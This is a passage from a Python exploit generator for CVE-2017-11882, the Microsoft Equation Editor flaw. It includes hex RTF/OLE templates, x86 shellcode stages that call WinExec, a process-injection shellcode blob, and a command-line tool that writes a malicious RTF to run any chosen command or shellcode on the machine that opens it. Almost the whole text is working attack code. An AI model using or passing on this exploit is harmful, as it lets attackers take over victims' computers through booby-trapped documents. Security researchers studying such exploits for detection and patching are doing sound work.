61616108000000320A4803BA340100000061000C000000320A48033A2D0A000000616161616161616161610C000000320A4803BA250A000000616161616161616161610C000000320A48033A1E0A000000616161616161616161610C000000320A4803BA160A000000616161616161616161610C000000320A48033A0F0A000000616161616161616161610C000000320A4803BA070A000000616161616161616161610C000000320A48033A000A0000006161616161616161616108000000320A0801BA340100000061610C000000320A08013A2D0A000000616161616161616161610C000000320A0801BA250A000000616161616161616161610C000000320A08013A1E0A000000616161616161616161610C000000320A0801BA160A000000616161616161616161610C000000320A08013A0F0A000000616161616161616161610C000000320A0801BA070A000000616161616161616161610C000000320A08013A000A000000616161616161616161610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000021008A0200000A00CD1166F121008A02FFFFFFFF78EF1900040000002D01010004000000F0010000030000000000
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
head605 = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070F7DECF0064D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''
stuff605 = '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000B5020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
tail605 = r'''
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: 31 db xor ebx,ebx
# 18: 53 push ebx
# 19: 51 push ecx
# 1a: be 64 3e 72 12 mov esi,0x12723e64
# 1f: 31 d6 xor esi,edx
# 21: ff 16 call DWORD PTR [esi] // call WinExec
# 23: 53 push ebx
# 24: 66 83 ee 4c sub si,0x4c
# 28: ff 10 call DWORD PTR [eax] // call ExitProcess
stagecmd = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
# pads with nop
stagecmd = stagecmd.ljust(44, '\x90')
# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: ff e1 jmp ecx
stagesc = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\xFF\xE1"
# pads with nop
stagesc = stagesc.ljust(44, '\x90')
# This is shellcode to inject into another EQNEDT32.EXE and execute it
# source at shellcode.c
stageinject = 'U\x8b\xec\x83\xe4\xf8\x81\xec\xc4\x03\x00\x00\xb9U\x95\xdbmSVW\xe8\xc8\x02\x00\x00\x8b\xf8\x85\xffu\x18\xb9u\xee@p\xe8\xb8\x02\x00\x00\x8b\xf8\x85\xffu\x083\xc0@\xe9\xa3\x02\x00\x00\xba\x9e3i\xb7\x8b\xcf\xe8\xfb\x02\x00\x00\x8b\xf0\x85\xf6t\xe6\xba*\x92\x12\xd8\xe8\xeb\x02\x00\x003\xdb\x89D$ \x85\xc0u\x03S\xff\xd6\xba\xc8\xe8"o\x8b\xcf\xe8\xd2\x02\x00\x00\x89D$8\x85\xc0u\x03S\xff\xd6\xba\xc2\xcf\xa2\xeb\x8b\xcf\xe8\xbb\x02\x00\x00\x89D$D\x85\xc0u\x03S\xff\xd6\xba\xaa?z\xbe\x8b\xcf\xe8\xa4\x02\x00\x00\x89D$4\x85\xc0u\x03S\xff\xd6\xba\xf3\xf4\xf8\x97\x8b\xcf\xe8\x8d\x02\x00\x00\x89D$$\x85\xc0u\x03S\xff\xd6\xbaN\x96 ~\x8b\xcf\xe8v\x02\x00\x00\x89D$0\x85\xc0u\x03S\xff\xd6\xba\x19.\xb5\xae\x8b\xcf\xe8_\x02\x00\x00\x8b\xd8\x85\xdbu\x03P\xff\xd6\xbaZj\x0c\xbb\x8b\xcf\xe8J\x02\x00\x00\x89D$@\x85\xc0u\x03P\xff\xd6\xba\x8d\xbfw\x82\x8b\xcf\xe83\x02\x00\x00\x89D$<\x85\xc0u\x03P\xff\xd6jDY\x8dD$X3\xd2\x88\x10@Iu\xfaj\x10Y\x8dD$H\x88\x10@Iu\xfa3\xc0\xc7D$XD\x00\x00\x00f\x89\x84$\x88\x00\x00\x00\x8dD$HP\x8dD$\\\xc7\x84$\x88\x00\x00\x00\x01\x00\x00\x00PRRj\x02RRR\x8dD$0\xc7D$0EQNEPR\xc7D$<DT32\[email protected]\x88T$D\xff\xd3\x85\xc0u\x04j\xff\xff\xd6j`Y\x8d\x84$\xa0\x00\x00\x00\xc6\x00\x00@Iu\xf9\x83\xbc$\xa0\x00\x00\x00\x03tA\x8b|$4\x8b\\$$h\x88\x13\x00\x00\x8d\x84$\xa4\x00\x00\x00P\xff\xd7\x85\xc0u\x03P\xff\xd6\x83\xbc$\xa0\x00\x00\x00\x03t\x19h\x02\x00\x01\x00\xfft$X\xfft$X\xff\xd3\x83\xbc$\xa0\x00\x00\x00\x03u\xc7\x8b\x9c$\xb0\x00\x00\x00\x8d\x84$\x00\x01\x00\x00\x8b\xbc$\xb4\x00\x00\x00\xb9\xcc\x02\x00\x00\xc6\x00\x00@Iu\xf9\x8d\x84$\x00\x01\x00\x00\xc7\x84$\x00\x01\x00\x00\x01\x00\x01\x00PW\xffT$L\x85\xc0u\x03P\xff\xd6\x8dD$,Pj@h\x00P\x00\x00h\x00\x10@\x00S\xffT$4\x85\xc0u\x03P\xff\xd6\x83d$,\x00\xe8k\x01\x00\x00\x83d$(\x00\x8dH\x01\x89L$ \x8bD$ \x8b\x00\x89D$(\x8dD$,\x83\xc1\x04P\xfft$,Qh\x00\x10@\x00S\xffT$L3\xdb\x85\xc0u\x03S\xff\xd6\x8d\x84$\x00\x01\x00\x00\xc7\x84$\xb8\x01\x00\x00\x00\x10@\x00PW\xffT$8\x85\xc0u\x03S\xff\xd6S\xffT$D\x85\xc0u\x03S\xff\xd6h\x02\x00\x01\x00\xfft$X\xfft$X\xffT$0\x85\xc0u\x03S\xff\xd6\xfft$P\xffT$@\x85\xc0u\x03S\xff\xd6S\xff\xd6_^[\x8b\xe5]\xc3U\x8b\xecQSVW\x8b\xd9d\xa10\x00\x00\x00\x8b@\x0c\x8bp\x0c\x8bV0\x8b\xc2\x89E\xfc\x85\xd2t%\x0f\xb7\x02\xb9\x05\x15\x00\x003\xff\xeb\rk\xc9!\x0f\xb7\xc0\x03\xc8G\x0f\xb7\x04zf\x85\xc0u\xee;\xcbt\x15\x8bE\xfc\x8b6\x8bV0;\xd0u\xce3\xc0_^[\x8b\xe5]\xc3\x8bF\x18\xeb\xf4U\x8b\xec\x83\xec\x10\x8bA<\x89U\xfc\x8bD\x08x\x85\xc0tV\x8bT\x08\x1cS\x8b\\\x08$\x03\xd1V\x8bt\x08 \x03\xd9\x8bD\x08\x18\x03\xf1\x89U\xf03\xd2\x89u\xf4\x89E\xf8W\x85\xc0t)\x8b4\x96\xbf\x05\x15\x00\x00\x03\xf1\xeb\tk\xff!\x0f\xbe\xc0\x03\xf8F\x8a\x06\x84\xc0u\xf1;}\xfct\x12\x8bu\xf4B;U\xf8r\xd73\xc0_^[\x8b\xe5]\xc3\x0f\xb7\x04S\x8bU\xf0\x8b\x04\x82\x03\xc1\xeb\xeb\xeb\x04\x8b\x04$\xc3\xe8\xf7\xff\xff\xff\xc3'
def genrtf605(type, cmd):
payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3\x99\x02\x00\x00\x00\x00\x00\x00H\x90]\x00l\x9c[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
if type:
payload += stagecmd
else:
payload += stagesc
payload += pack('<I', 0x00402114) # ret
payload += '\x00' * 2
left = 0x100 - len(payload)
payload += cmd[:left]
payload = payload.ljust(0x100, '\x00')
return head605 + payload.encode('hex') + stuff605 + cmd[left:].ljust(437, '\x00').encode('hex') + tail605
def genrtf17k(type, cmd):
payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3kF\x00\x00\x00\x00\x00\x00\xa0_s\x00d\x0cq\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
if type:
payload += stagecmd
else:
payload += stagesc
payload += pack('<I', 0x00402114) # ret
payload += '\x00' * 2
payload += cmd
payload = payload.ljust(18055, '\x00')
return head17k.lower() + payload.encode('hex') + tail17k.lower()
def genrtf(type, cmd):
if len(cmd) > 17967:
if type:
raise ValueError('Command must be shorter than 17967 bytes!')
else:
raise ValueError('Code must be shorter than 17967 bytes!')
if len(cmd) > 605:
return genrtf17k(type, cmd)
else:
return genrtf605(type, cmd)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='CVE-2017-11882.py',
description="Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)")
parser.add_argument("-c", "--cmd",
help="Command or shellcode file to run in target system\n(Must be shorter than 17967 bytes!!)",
required=True)
parser.add_argument("-t", "--type", help="Type (0:shellcode 1:command, default=1)", default=1, type=int,
choices=[0, 1],
required=False)
parser.add_argument("-i", "--inject", help="Inject shellcode to new process", default=None, required=False)
parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
args = parser.parse_args()
data = ''
if args.type:
data = args.cmd
else:
try:
f = open(args.cmd, 'rb')
data = f.read()
f.close()
if args.inject is not None:
data = stageinject + pack('<I', len(data)) + data
except:
raise ValueError('Error in reading shellcode file!')
with open(args.output, 'wb') as f:
f.write(genrtf(args.type, data))
f.close()
print 'Done.'